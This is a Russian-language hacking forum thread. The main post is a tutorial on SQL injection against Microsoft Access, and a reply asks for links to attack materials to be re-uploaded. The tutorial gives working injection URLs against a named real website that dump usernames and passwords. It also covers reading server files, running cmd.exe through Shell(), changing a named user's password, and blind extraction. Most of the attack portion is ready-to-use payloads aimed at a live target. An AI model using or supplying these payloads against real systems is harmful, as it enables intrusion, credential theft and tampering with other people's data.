Старый 20.10.2010, 16:19   #1
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию Microsoft Access SQL Injection [Дополнения]

==============================================
[Microsoft Access SQL Injection] - Дополнения. v1.1
==============================================


=================
Вместо вступления
=================

В этой статье я освещу некоторые фишки (в том числе от Майкрософт), результаты моей работы в области взлома
MSAccess, ключевые моменты вольно переведённой мной статьи по пентестингу аксесса и ответы на некоторые возникающие вопросы;
можете считать это дополнением к исследованию товарища [53x]Shadow. В качестве примера будет использована уязвимость, найденная на http://www.spokanemarcom[antigoogle].com
Ссылки, копирайты и тд - в конце.

======
Начало
======

Известно, что MS Access не поддерживает ни один вид комментариев, но для усечения запроса можно использовать %00 или %16,
последнее нужно использовать, если нулл-байт вызывает ошибку (Division by zero).

Аналогами concat() в msaccess являются "+" в урл-енкоде - "%2b" и амперсанд - "&", если не работает одно, то пашет второе.

Выражение, заключенное в кавычки (апострофы), не может содержать внутренние кавычки (апострофы).

Две кавычки ("") в строке воспринимаются в Access как одна кавычка.

Для представления символа кавычки в строковом выражении может использоваться символ сhr(34), где 34 — код кавычки в
стандарте ANSI.

До версии 2007 года движком ms access был MS Jet, после - Access Connectivity Engine (ACE).

=======
Функции
=======

Код:
rnd() - Возвращает значение типа Single, содержащее случайное число. Функция Rnd возвращает значение 
меньше 1 и не меньше нуля.

first(), last() - Возвращают значение поля из первой или последней записи в результирующем наборе, который 
возвращается запросом.

iif() - Данная функция возвращает одну из двух частей в зависимости от результата вычисления выражения.
iif(выражение, если_истина, если_ложь)

min(), max() - Возвращают минимальное или максимальное из значений, содержащихся в заданном поле запроса.

count() - Вычисляет количество записей, возвращенных запросом.
...select+count(*)+as+AllUsers+from+Users
...select+count('ShippedDate & Freight')+from+Orders

chr() - Перевод строки в chr-представление (понадобится для обхода фильтрации)
сhr(10) возвращает знак переноса строки.

asc() - Перевод строки в ASCII-представление

mid() - Можно использовать для создания подзапроса. Цифра_1 указывает, с какого символа начинать выводить данные, 
цифра_2 - сколько данных вывести
mid(значение,цифра_1,цифра_2)
Как-то так:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,mid(username%2bchr(58)%2bpassword,1),3,4,5,6,7,8,9,10,11+from+members%00

typename() - определение типа данных
=====================
Системные переменные:
=====================

Код:
date() - текущая дата
now - системное время
==================
...select+top+n...
==================

top n [percent] возвращает определенное число записей, находящихся в начале или в конце диапазона, описанного с помощью
предложения ORDER BY. Следующая инструкция SQL позволяет получить список пользователей с паролями, у которых id больше
десяти:

Код:
...select+top+25+username%2bchr(59)%2bpassword+from+members+where+id>10+order+by+id%00
Если предложение ORDER BY будет опущено, запрос возвратит произвольный набор 25 записей из таблицы "members",
удовлетворяющих предложению where. Предикат TOP не осуществляет выбор между равными значениями.

==========================
...with+owneraccess+option
==========================

Всё по словам Microsoft.
Используется для предоставления пользователю, работающему с запросом, разрешений, соответствующих разрешениям владельца
запроса. Следующий пример показывает, как можно просматривать сведения о пользователях (даже если нет доступа к таблице
members) при условии, что владелец запроса имеет данное разрешение.

Код:
...select+username%2bpassword%2bemail+from+members+order+by+username+with+owneraccess+option
Если пользователю запрещено создавать таблицу или вносить в нее изменения, то при помощи WITH OWNERACCESS OPTION можно
выполнить запрос на создание таблицы или запрос на добавление. Данный параметр требует наличия доступа к файлу System.mdw,
сопоставленному базе данных (он используется только при работе в защищенных многопользовательских системах).

=======================
О подстановочных знаках
=======================

Запрос с подстановочными знаками в условиях отбора может в разных режимах возвращать разные результаты.
Например, по-разному будут выполняться следующие запросы.
Запрос ANSI-89 SQL в базе данных, настроенной на режим запросов ANSI-92, например:

Код:
...select+*+from+users+where+country+like+'U*'
В нем будут возвращены все пользователи из страны «U*», а не из всех стран на «U», поскольку звездочка (*) не является
подстановочным знаком в ANSI-92 SQL.
Запрос ANSI-92 SQL в базе данных, настроенной на режим запросов ANSI-89, например:

Код:
...select+*+from+users+where+country+like+'U%'
В нем будут возвращены все пользователи из страны «U%», а не из всех стран на «U», поскольку знак процентов (%) не является
подстановочным знаком в ANSI-89 SQL.



Примеры поиска с помощью like (alike):
--------------------------------------

Код:
...+select+top+1+members.password+from+members+where+members.username+alike+'admi_'%00
...+select+top+1+password+from+members+where+username+like+'adm__'%00
...+select+top+1+password+from+members+where+(username+like+"adm*")%00
...+select+top+1+password+from+members+where+username+like+chr(97)%2bchr(100)%2bchr(109)%2bchr(105)%2bchr(110)%00
...+select+top+1+password+from+members+where+username+like+'[a-cA-C0-9]'%00
=============
Type mismatch
=============

При несовпадении типа данных переводим в нужный при помощи StrConv()
Пример: strconv(admin,1) -> ADMIN

Основные значения:


Каждая из этих функций приводит выражение к определенному типу данных. В скобках любое строковое или числовое "выражение".
Тип возвращаемого значения определяется по имени функции в соответствии со следующей таблицей:


====================
О системных таблицах
====================

Да, в большинстве случаев к ним нет доступа, но уж если такое произошло..



=====================
Определение версии БД
=====================

Табличка:


Определяется, думаю, понятно как; приведу пример:

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+MSysModules2%00
Получаем "...Make sure it exists and that its name is spelled correctly...", значит, такой таблицы не существует и
версия > 1997 года, продолжаем.

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+MSysAccessObjects%00
Страница отобразилась нормально.

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+MSysAccessXML%00
Ничего не отобразило, но нет и ошибки, значит, таблица существует. Следовательно, версия БД - 2000.

==================
Определение движка
==================

1\ это JET, если в ошибке мы видим:
[Microsoft][ODBC Microsoft Access Driver]

или

Microsoft JET Database Engine

2\ это ACE, если:
Microsoft Office Access Database Engine

то есть мы имеем дело с 2007 версией БД

=========================
Использование символа "|"
=========================

Работает ТОЛЬКО в MS Jet v3.5, позволяет использовать содержимое между "||" до парсинга всего запроса.
Например:
Код:
http://www.site.com/news.asp?id=|99+1|%16


======================
Получение имён колонок
======================

Вариант 1:
----------

Если в select'е не используется "*", например:
Код:
SELECT id, email FROM users WHERE username='user' and password='pass'


то, используя group by, можно получить имена колонок:

Код:
SELECT id, email FROM users WHERE username='1' GROUP BY 1 HAVING '1'='1' and password=''
Пример вывода в ошибке:
Код:
Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression 'id' 
as part of an aggregate function.
Продолжаем, второй запрос:

Код:
SELECT id, email FROM users WHERE username='1' GROUP BY 1,id HAVING '1'='1' and password=''
Получим, допустим, "...'email'...", составим следующее:

Код:
SELECT id, email FROM users WHERE username='1' GROUP BY 1,id,email HAVING '1'='1' and password=''
И т.д. Если в ответ получаем ошибку:
Код:
Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression ''1'='1' and password=''' 
as part of an aggregate function.
значит, мы получили имена всех колонок.

Вариант 2:
----------

1\ Если в запросе используется "*" и существует ошибка типа:
Код:
Microsoft JET Database Engine (0x80040E21)
Cannot group on fields selected with '*'.
то мы можем получить имя одной колонки следующим образом:

Код:
SELECT * FROM users WHERE username='1' HAVING sum('1')='1' and password=''
В ответ получаем:
Код:
Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression 'ID'
as part of an aggregate function.
В её имени может содержаться, например, префикс, что поможет в следующем шаге.

2\ Брутфорс. Если имя подобрано правильно, то не будет выведена ошибка (...No value given for...).

Код:
SELECT * FROM users WHERE username='1' AND имя_колонки='1' and password=''
Вариант 3:
----------

Похож на второй, возможен при известном имени таблицы; составляем запрос:

Код:
SELECT * FROM users WHERE username='1' UNION SELECT имя_колонки, null FROM имя_таблицы WHERE '1'='1' and password=''
При правильно подобранном имени колонки не будет ошибки.

=================================
Определение типа данных в колонке
=================================

Для этого существует функция TypeName()
Пример использования:

Код:
SELECT * FROM users WHERE username='1' UNION SELECT TypeName(имя_колонки), null FROM имя_таблицы WHERE '1'='1' and password=''

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,typename(username),3,4,5,6,7,8,9,10,11+from+members%00
==========
Внешние БД
==========

В MS Jet есть возможность просматривать данные из внешних БД (здесь имеются в виду базы формата ms access). Делается так:

Код:
SELECT * FROM users WHERE username='1' UNION SELECT id FROM имя_таблицы IN 'путь_к_бд' WHERE '1'='1' and password=''
Запрос "...select+id+from+(c:\db\database.mdb)+users. .." аналогичен "...select+id+from+[c:\db\database.mdb].users...",
также "...select+id+from+users+in+'c:\db\database.mdb'.. ."

===========================================
Чтение файлов отличных от формата ms access
===========================================

Читать возможно файлы форматов txt, csv, tab, asc, tmp, htm, html
1\ Для начала нужно достать путь к БД при помощи раскрытия, описанного [53x]Shadow:

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,*,3,4,5,6,7,8,9,10,11+from+ololo+in+'.'%00
Путь - c:\windows\system32\inetsrv

2\ Читаем так:

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,*,3,4,5,6,7,8,9,10,11+from+[TEXT;DATABASE=c:\windows\system32\inetsrv].[c:\some_name.txt]%00
или, похожий запрос:

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,*,3,4,5,6,7,8,9,10,11+from+[Excel+8.0;DATABASE=c:\ololo.xls].[sheet1$]%00
Здесь поясню. Запрос строится так:

Для подключений типа ISAM
-------------------------

Код:
...FROM+[тип_данных;DATABASE=путь_к_бд].[путь_к_файлу]
Тип данных можно посмотреть в реестре в ветвях:
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\ISA M Formats"
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0 \Access Connectivity Engine\ISAM Formats"




Для ODBC
--------

Код:
...FROM+[ODBC;DRIVER=имя_драйвера]
Смотрим тут:
"HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI "



Но так как MS Jet не позволяет использовать подключение ODBC к драйверу MS Access, то придётся использовать ISAM.
TOP 1 используется для нумерации строк.

==========
Команды ОС
==========

Если субд работает не в защищённом режиме (т.е. он либо выключен, либо версия MS Jet < 3.51.33x), то возможно использовать
системные команды.

Код:
CurDir() - Возвращает значение типа Variant (String), указывающее текущий путь.

Dir() - Возвращает значение типа String, определяющее имя файла, каталога или папки, которое соответствует указанному 
шаблону, атрибуту файла либо метке тома диска.
dir('c:\')

FileDateTime() - Возвращает значение типа Variant (Date), указывающее дату и время создания или последнего изменения файла.
filedatetime('c:\boot.ini')

FileLen() - Возвращает значение типа Long, задающее длину файла в байтах.
filelen('c:\boot.ini')

GetAttr() - Данная функция возвращает значение типа Integer, представляющее атрибуты файла, каталога или папки.
getattr('c:\boot.ini')

Shell() - Запускает исполняемую программу и возвращает значение типа Variant (Double), содержащее код задачи этой программы, если 
запуск прошел успешно; в противном случае возвращает нуль.
shell('c:\windows\system32\cmd.exe')
=========================================
Об инъекциях в insert, update, delete, select ... into
=========================================

По аналогии с другими субд

Код:
+union+insert+into+members+(id,username,password)+values+('999','some_name','password')%00
Или:
Код:
+union+update+members+set+password=pass+where+username='anne.mckeon@providence.org'%00
Создание таблицы, запись в файл:

Код:
+union+select+IIf(False,CLng(0),%22%22)+as+a+into+ololo%00

+union+select+'param_pam_pam'+into+[TEXT;DATABASE=c:\windows\system32\inetsrv].[c:\windows\win_log.txt]%00
===============
Blind Injection
===============

Здесь всё обстоит так же, как и в других СУБД, например берём ASCII-значение имени пользователя и сравниваем, пока хватит
терпения:

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=1+and+asc(mid((select+top+1+username+from+members),1,1))=97%00
Или, вариант номер 2:

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=iif((select+mid(last(username),1,1)+from+(select+top+1+username+from+members))='a',0,'no')%00
Номер 3:

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=1+and+1=0+or+'a'=iif((select+mid(last(username),1,1)+from+(select+top+1+username+from+members))='a','a','b')%00
=================
Примеры запросов:
=================

Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassword,3,4,5,6,7,8,9,10,11+from+members+order+by+id%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,username,3,4,5,6,7,8,9,10,11+from+members+where+username+not+in+(select+top+1+username+from+members)%00
Вывод содержимого нескольких полей за один запрос:
Код:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,(select+top+1+username+from+members)%2bchr(58)%2b(select+top+1+username+from+members+where+username+not+in+(select+top+1+username+from+members)),3,4,5,6,7,8,9,10,11+from+members%00
=======
Ссылки:
=======

З.Ы. Конструктивная критика и дополнения приветствуются
(с) aka_zver, 08.06.2010
aka_zver вне форума   Ответить с цитированием
Старый 09.05.2011, 08:16   #2
FliP
 
Регистрация: 09.08.2010
Сообщений: 19
Репутация: -1
По умолчанию

перезалейте плз у кого осталось две ссылки:
Материал
Видео Пашкелы по взлому аксесса Тулзой
FliP вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot